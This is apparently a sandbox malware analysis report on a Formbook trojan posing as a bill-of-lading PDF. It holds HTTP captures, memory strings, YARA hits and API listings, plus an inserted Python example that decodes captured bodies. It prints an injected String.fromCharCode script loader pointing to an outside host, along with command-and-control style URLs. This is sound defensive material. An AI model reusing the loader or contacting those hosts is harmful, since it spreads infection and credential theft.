2c 20 31 30 35 2c 20 31 31 32 2c 20 31 31 36 2c 20 33 34 2c 20 33 32 2c 20 31 31 35 2c 20 31 31 34 2c 20 39 39 2c 20 36 31 2c 20 33 34 2c 31 30 34 2c 20 31 31 36 2c 20 31 31 36 2c 20 31 31 32 2c 20 31 31 35 2c 20 35 38 2c 20 34 37 2c 20 34 37 2c 20 31 31 35 2c 20 31 31 31 2c 20 34 36 2c 20 35 35 2c 20 35 36 2c 20 35 37 2c 
20 31 32 31 2c 20 31 32 31 2c 20 31 30 30 2c 31 31 35 2c 20 34 36 2c 20 31 30 35 2c 20 39 39 2c 20 31 31 37 2c 20 34 37 2c 20 31 30 36 2c 20 31 31 35 2c 20 34 37 2c 20 31 30 36 2c 20 31 31 35 2c 20 34 35 2c 20 31 Data Ascii: 255<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body><script>var xt = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 108, 97, 110, 103, 117, 97, 103, 101, 61, 34,106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 32, 115, 114, 99, 61, 34,104, 116, 116, 112, 115, 58, 47, 47, 115, 111, 46, 55, 56, 57, 121, 121, 100,115, 46, 105, 99, 117, 47, 106, 115, 47, 106, 115, 45, 1
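The Cloudflare responses above (03:09:12 to 03:09:17 GMT) are chunked and gzip-encoded, so their "Data Ascii" rendering is unreadable, and the nginx 404 at 03:09:20 GMT carries an injected `<script>` whose tag is assembled with `String.fromCharCode(...)`. The following Python is an added worked example, not part of the Joe Sandbox report: it turns a "Data Raw" hex dump back into bytes, reassembles the chunked body, inflates the gzip member and checks its trailer, and decodes the char-code list from the captured page. The two sample inputs are copied from the report's own dump fields (the fromCharCode list is cut off on the page after "45, 1", so the decoder drops that unterminated value); the helper names and the `decode_cf_404` wrapper are this example's own.

```python
"""Decode captured HTTP bodies from a sandbox 'Data Raw' / 'Data Ascii' dump.

Added example for the 404 responses in the report above; not report code.
"""
from __future__ import annotations

import re
import zlib

# Sample 1 (copied from the report): body of the Cloudflare 404 at 03:09:12 GMT.
# Chunk-size line "12a\r\n", 0x12a = 298 bytes of gzip, then last-chunk "0\r\n\r\n".
CF_404_RAW = """
31 32 61 0d 0a
1f 8b 08 00 00 00 00 00 00 03 85 92 c1 6e c3 20 0c 86 ef 95
fa 0e 3e b6 92 d5 40 02 a4 51 19 97 4a 3b ee b2 27 c8 12 da
44 6a c8 c4 e8 96 bd fd e4 04 a2 a9 87 ed 80 31 f6 e7 1f 0c
e8 2e 0c 37 b3 dd e8 ce d6 ad d1 a1 0f 37 6b 04 13 f0 32 06
78 1e ef ae d5 d9 12 d4 d9 8c 6c 37 fa 6d 6c bf 69 6e ac 0b
d6 1b dd f1 c7 8a 8e 1b 9d c5 34 69 7b 93 60 77 ed dd f4 3b
97 cd 6a fa a3 f1 fd 7b 30 9f b5 87 29 c0 13 bc 06 df bb eb
e1 e2 c7 e1 dc d5 fe 3c b6 76 a7 18 02 e7 12 a1 aa c8 11 08
9c 49 f2 72 32 0a a1 20 87 1d 11 aa 92 22 84 b3 82 bc 32 86
e6 15 e3 08 8a 23 14 02 39 53 09 5e ab fe d2 17 71 0f 2e 23
40 e4 aa 25 22 16 4d 02 e5 11 41 94 cb 88 95 1c 41 28 04 49
59 9a 29 93 f3 64 18 c3 99 23 64 3e c1 72 9e 24 c1 54 d4 79
58 c9 24 cf ca 45 24 0a 54 18 db 58 23 a9 84 fa 51 39 02 5d
ac f8 af 79 95 ef 4f ed d8 dc 07 eb c2 e1 cb f7 c1 ee a6 b0
3f e9 2c 3e 1d bd 65 fc 4c 3f c2 ab eb 02 55 02 00 00
0d 0a 30 0d 0a 0d 0a
"""

# Sample 2 (copied from the report's 'Data Ascii' field): start of the nginx 404
# page at 03:09:20 GMT. The page truncates the dump after "45, 1".
NGINX_404_ASCII = (
    '<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n'
    '<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx</center>\r\n'
    '</body><script>var xt = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, '
    '108, 97, 110, 103, 117, 97, 103, 101, 61, 34,106, 97, 118, 97, 115, 99, 114, 105, '
    '112, 116, 34, 32, 115, 114, 99, 61, 34,104, 116, 116, 112, 115, 58, 47, 47, 115, '
    '111, 46, 55, 56, 57, 121, 121, 100,115, 46, 105, 99, 117, 47, 106, 115, 47, 106, '
    '115, 45, 1'
)


def hex_dump_to_bytes(dump: str) -> bytes:
    """Turn a whitespace-separated 'Data Raw' hex dump back into raw bytes."""
    return bytes.fromhex("".join(dump.split()))


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked transfer-coding body (chunk-size is hex)."""
    out = bytearray()
    pos = 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";", 1)[0], 16)  # drop chunk extensions
        pos = end + 2
        if size == 0:                 # last-chunk; trailer fields are ignored here
            break
        out += body[pos:pos + size]
        pos += size + 2               # skip the CRLF that ends every chunk
    return bytes(out)


def gzip_trailer(member: bytes) -> tuple[int, int]:
    """Return (CRC32, ISIZE) from the 8-byte little-endian gzip trailer (RFC 1952)."""
    return int.from_bytes(member[-8:-4], "little"), int.from_bytes(member[-4:], "little")


def gunzip(member: bytes) -> bytes:
    """Inflate one gzip member; wbits 16+MAX_WBITS makes zlib parse the gzip wrapper and verify the CRC."""
    return zlib.decompress(member, 16 + zlib.MAX_WBITS)


def decode_cf_404() -> bytes:
    """Full pipeline for sample 1: hex -> bytes -> de-chunk -> gunzip, cross-checked against the trailer."""
    member = dechunk(hex_dump_to_bytes(CF_404_RAW))
    crc, isize = gzip_trailer(member)
    html = gunzip(member)
    if len(html) != isize or zlib.crc32(html) != crc:
        raise ValueError("gzip trailer does not match inflated data")
    return html


FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]*)")


def decode_fromcharcode(page: str) -> list[str]:
    """Decode every String.fromCharCode(...) argument list found in `page`.

    If the list is not closed by ')' and its last token is not comma-terminated,
    that token is assumed to be cut off by the dump and is dropped, not decoded.
    """
    results = []
    for m in FROMCHARCODE.finditer(page):
        args = m.group(1)
        closed = page[m.end():m.end() + 1] == ")"
        nums = [int(n) for n in re.findall(r"\d+", args)]
        if not closed and nums and not args.rstrip().endswith(","):
            nums.pop()
        results.append("".join(chr(n) for n in nums))
    return results


if __name__ == "__main__":
    print(decode_cf_404()[:80])
    print(decode_fromcharcode(NGINX_404_ASCII))
```

The gzip trailer of the Cloudflare body reports ISIZE 597, the same value as the uncompressed chunk size `255` (0x255 = 597) in the response at 03:09:20 GMT, so the three gzipped 404s are almost certainly the same page. The visible char codes decode to `<script language="javascript" src="https://so.789yyds.icu/js/js-` before the dump is cut off: the "404" these decoy-domain requests receive is not an empty error page but a third-party script loader injected into the server's error template, which is worth recording as an indicator in its own right rather than treating the 404s as noise.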
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-dns-prefetch-control: onset-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Thu, 21-Nov-2024 03:09:26 GMT; Max-Age=2419200; path=/; secure; SameSite=Strictx-litespeed-tag: b37_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 24 Oct 2024 03:09:26 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 34 35 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 74 77 ec d6 97 38 f1 c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a eb ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 cd 5f 8e 3e 1d 5e fe 72 fe 16 8d e2 b1 b7 f7 f2 0d fc 83 5c ca 76 35 2f 66 1a f2 b0 3f dc d5 88 af 7f b9 d0 50 c8 c8 80 de ee 6a c1 b0 87 46 71 1c 46 bd ed ed 60 18 d6 c7 64 db 8f 5e 69 50 9a 60 77 ef e5 8b 37 63 12 63 e4 8c 30 8b 48 bc ab 7d b9 3c d6 3b 1a da ce 73 7c 3c 26 bb da 0d 25 93 30 60 b1 86 9c c0 8f 89 1f ef 6a 13 ea c6 a3 5d 97 dc 50 87 e8 fc a3 86 a8 4f 63 8a 3d 3d 72 b0 47 76 4d 8e e7 e5 8b 17 6f fe a2 eb 68 df f3 10 f5 d1 27 9f a0 8b b7 9f 50 a3 de ae 1b 48 47 98 06 11 09 ea 4e 30 46 ba be f7 ff 00 3a a6 b1 47 f6 de 6c 8b 7f 21 45 e1 84 05 fd 20 8e 14 3e fc 80 fa 2e b9 15 3c 17 40 87 c4 27 0c c7 01 53 a0 4b 5c 6c ee 9f 7c ba 78 fb 69 4b b0 93 e1 88 1c 46 c3 18 c5 d3 90 ec 6a 38 0c 3d ea e0 98 06 fe b6 e7 fe ed 7b 14 f8 1a 72 3c 1c 45 bb 9a 60 5e 8f 9c 11 19 63 0d ca be b8 d3 fe c1 89 dd c6 5a 4f 13 92 ff b6 fd 6d 5b 80 d4 03 36 d4 6a da 3f 86 0c 87 23 ad f7 af 3b ed 1f 40 44 
eb 69 07 8c 60 d7 61 c9 b8 7f 4a a3 18 60 a8 5b 40 30 9e 32 ea 92 61 32 ad fb 24 fe b6 7d 3d 9c ba df b6 5f f5 f3 62 9e 28 46 63 32 06 0c 6f 3d Data Ascii: 459f}kw?e^tw8N>$IHe{vM"`0_>^r\v5/f?PjFqF`d^iP`w7cc0H}<;s|<&%0`j]POc==rGvMoh'PHGN0F:Gl!E >.<@'SK\l|xiKFj8={r<E`^cZOm[6j?#;@Di`aJ`[@02a2$}=_b(Fc2o=
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            x-powered-by: PHP/7.4.33
            x-dns-prefetch-control: on
            set-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Thu, 21-Nov-2024 03:09:28 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict
            x-litespeed-tag: b37_HTTP.404
            expires: Wed, 11 Jan 1984 05:00:00 GMT
            content-type: text/html; charset=UTF-8
            link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/"
            x-litespeed-cache-control: no-cache
            cache-control: no-cache, no-store, must-revalidate, max-age=0
            transfer-encoding: chunked
            content-encoding: gzip
            vary: Accept-Encoding
            date: Thu, 24 Oct 2024 03:09:29 GMT
            server: LiteSpeed
            strict-transport-security: max-age=63072000; includeSubDomains
            x-frame-options: SAMEORIGIN
            x-content-type-options: nosniff
            Data Raw: 34 35 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 74 77 ec d6 97 38 f1 c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a eb ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 cd 5f 8e 3e 1d 5e fe 72 fe 16 8d e2 b1 b7 f7 f2 0d fc 83 5c ca 76 35 2f 66 1a f2 b0 3f dc d5 88 af 7f b9 d0 50 c8 c8 80 de ee 6a c1 b0 87 46 71 1c 46 bd ed ed 60 18 d6 c7 64 db 8f 5e 69 50 9a 60 77 ef e5 8b 37 63 12 63 e4 8c 30 8b 48 bc ab 7d b9 3c d6 3b 1a da ce 73 7c 3c 26 bb da 0d 25 93 30 60 b1 86 9c c0 8f 89 1f ef 6a 13 ea c6 a3 5d 97 dc 50 87 e8 fc a3 86 a8 4f 63 8a 3d 3d 72 b0 47 76 4d 8e e7 e5 8b 17 6f fe a2 eb 68 df f3 10 f5 d1 27 9f a0 8b b7 9f 50 a3 de ae 1b 48 47 98 06 11 09 ea 4e 30 46 ba be f7 ff 00 3a a6 b1 47 f6 de 6c 8b 7f 21 45 e1 84 05 fd 20 8e 14 3e fc 80 fa 2e b9 15 3c 17 40 87 c4 27 0c c7 01 53 a0 4b 5c 6c ee 9f 7c ba 78 fb 69 4b b0 93 e1 88 1c 46 c3 18 c5 d3 90 ec 6a 38 0c 3d ea e0 98 06 fe b6 e7 fe ed 7b 14 f8 1a 72 3c 1c 45 bb 9a 60 5e 8f 9c 11 19 63 0d ca be b8 d3 fe c1 89 dd c6 5a 4f 13 92 ff b6 fd 6d 5b 80 d4 03 36 d4 6a da 3f 86 0c 87 23 ad f7 af 3b ed 1f 40 44 eb 69 07 8c 60 d7 61 c9 b8 7f 4a a3 18 60 a8 5b 40 30 9e 32 ea 92 61 32 ad fb 24 fe b6 7d 3d 9c ba df b6 5f f5 f3 62 9e 28 46 63 32 06 0c 6f 3d
            Data Ascii: 4599}kw?e^tw8N>$IHe{vM"`0_>^r\v5/f?PjFqF`d^iP`w7cc0H}<;s|<&%0`j]POc==rGvMoh'PHGN0F:Gl!E >.<@'SK\l|xiKFj8={r<E`^cZOm[6j?#;@Di`aJ`[@02a2$}=_b(Fc2o=
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            x-powered-by: PHP/7.4.33
            x-dns-prefetch-control: on
            set-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Thu, 21-Nov-2024 03:09:31 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict
            x-litespeed-tag: b37_HTTP.404
            expires: Wed, 11 Jan 1984 05:00:00 GMT
            content-type: text/html; charset=UTF-8
            link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/"
            x-litespeed-cache-control: no-cache
            cache-control: no-cache, no-store, must-revalidate, max-age=0
            transfer-encoding: chunked
            content-encoding: gzip
            vary: Accept-Encoding
            date: Thu, 24 Oct 2024 03:09:31 GMT
            server: LiteSpeed
            strict-transport-security: max-age=63072000; includeSubDomains
            x-frame-options: SAMEORIGIN
            x-content-type-options: nosniff
            Data Raw: 34 35 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 74 77 ec d6 97 38 f1 c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a eb ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 cd 5f 8e 3e 1d 5e fe 72 fe 16 8d e2 b1 b7 f7 f2 0d fc 83 5c ca 76 35 2f 66 1a f2 b0 3f dc d5 88 af 7f b9 d0 50 c8 c8 80 de ee 6a c1 b0 87 46 71 1c 46 bd ed ed 60 18 d6 c7 64 db 8f 5e 69 50 9a 60 77 ef e5 8b 37 63 12 63 e4 8c 30 8b 48 bc ab 7d b9 3c d6 3b 1a da ce 73 7c 3c 26 bb da 0d 25 93 30 60 b1 86 9c c0 8f 89 1f ef 6a 13 ea c6 a3 5d 97 dc 50 87 e8 fc a3 86 a8 4f 63 8a 3d 3d 72 b0 47 76 4d 8e e7 e5 8b 17 6f fe a2 eb 68 df f3 10 f5 d1 27 9f a0 8b b7 9f 50 a3 de ae 1b 48 47 98 06 11 09 ea 4e 30 46 ba be f7 ff 00 3a a6 b1 47 f6 de 6c 8b 7f 21 45 e1 84 05 fd 20 8e 14 3e fc 80 fa 2e b9 15 3c 17 40 87 c4 27 0c c7 01 53 a0 4b 5c 6c ee 9f 7c ba 78 fb 69 4b b0 93 e1 88 1c 46 c3 18 c5 d3 90 ec 6a 38 0c 3d ea e0 98 06 fe b6 e7 fe ed 7b 14 f8 1a 72 3c 1c 45 bb 9a 60 5e 8f 9c 11 19 63 0d ca be b8 d3 fe c1 89 dd c6 5a 4f 13 92 ff b6 fd 6d 5b 80 d4 03 36 d4 6a da 3f 86 0c 87 23 ad f7 af 3b ed 1f 40 44 eb 69 07 8c 60 d7 61 c9 b8 7f 4a a3 18 60 a8 5b 40 30 9e 32 ea 92 61 32 ad fb 24 fe b6 7d 3d 9c ba df b6 5f f5 f3 62 9e 28 46 63 32 06 0c 6f 3d
            Data Ascii: 459f}kw?e^tw8N>$IHe{vM"`0_>^r\v5/f?PjFqF`d^iP`w7cc0H}<;s|<&%0`j]POc==rGvMoh'PHGN0F:Gl!E >.<@'SK\l|xiKFj8={r<E`^cZOm[6j?#;@Di`aJ`[@02a2$}=_b(Fc2o=
            Source: gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000003D34000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://fonts.googleapis.com/css?family=Open
            Source: write.exe, 00000006.00000002.4199021096.0000000005BA4000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000003D34000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://justinmezzell.com
            Source: write.exe, 00000006.00000002.4199021096.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000004058000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://myrideguy.net/kgyd/?Znyl=2rnxDB&Qzj=Wu3HLPqvQhberYZQa2vA
            Source: gNKNuXuipEBZec.exe, 00000007.00000002.4200186991.000000000517C000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.barbequecritics.com
            Source: gNKNuXuipEBZec.exe, 00000007.00000002.4200186991.000000000517C000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.barbequecritics.com/el3s/
            Source: write.exe, 00000006.00000002.4199021096.0000000005BA4000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000003D34000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.dzyngiri.com
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: write.exe, 00000006.00000002.4199021096.000000000555C000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.00000000036EC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://http.gn301.com:12345/?u=
            Source: write.exe, 00000006.00000002.4197383900.00000000028A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: write.exe, 00000006.00000002.4197383900.00000000028CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: write.exe, 00000006.00000002.4197383900.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4197383900.00000000028CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: write.exe, 00000006.00000002.4197383900.00000000028A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: write.exe, 00000006.00000002.4197383900.00000000028A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: write.exe, 00000006.00000002.4197383900.00000000028A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: write.exe, 00000006.00000003.2371778257.0000000007621000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_00459FFF
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW | 0_2_00456354
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_0047C08E

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sample | Static PE information: Filename: Bill Of Lading_MEDUVB935991.pdf.exe
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042C503 NtClose | 1_2_0042C503
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72B60 NtClose,LdrInitializeThunk | 1_2_03C72B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk | 1_2_03C72DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk | 1_2_03C72C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C735C0 NtCreateMutant,LdrInitializeThunk | 1_2_03C735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C74340 NtSetContextThread | 1_2_03C74340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C74650 NtSuspendThread | 1_2_03C74650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72BE0 NtQueryValueKey | 1_2_03C72BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72BF0 NtAllocateVirtualMemory | 1_2_03C72BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72B80 NtQueryInformationFile | 1_2_03C72B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72BA0 NtEnumerateValueKey | 1_2_03C72BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72AD0 NtReadFile | 1_2_03C72AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72AF0 NtWriteFile | 1_2_03C72AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72AB0 NtWaitForSingleObject | 1_2_03C72AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72FE0 NtCreateFile | 1_2_03C72FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72F90 NtProtectVirtualMemory | 1_2_03C72F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72FA0 NtQuerySection | 1_2_03C72FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72FB0 NtResumeThread | 1_2_03C72FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72F60 NtCreateProcessEx | 1_2_03C72F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72F30 NtCreateSection | 1_2_03C72F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72EE0 NtQueueApcThread | 1_2_03C72EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72E80 NtReadVirtualMemory | 1_2_03C72E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72EA0 NtAdjustPrivilegesToken | 1_2_03C72EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72E30 NtWriteVirtualMemory | 1_2_03C72E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72DD0 NtDelayExecution | 1_2_03C72DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72DB0 NtEnumerateKey | 1_2_03C72DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72D00 NtSetInformationFile | 1_2_03C72D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72D10 NtMapViewOfSection | 1_2_03C72D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72D30 NtUnmapViewOfSection | 1_2_03C72D30
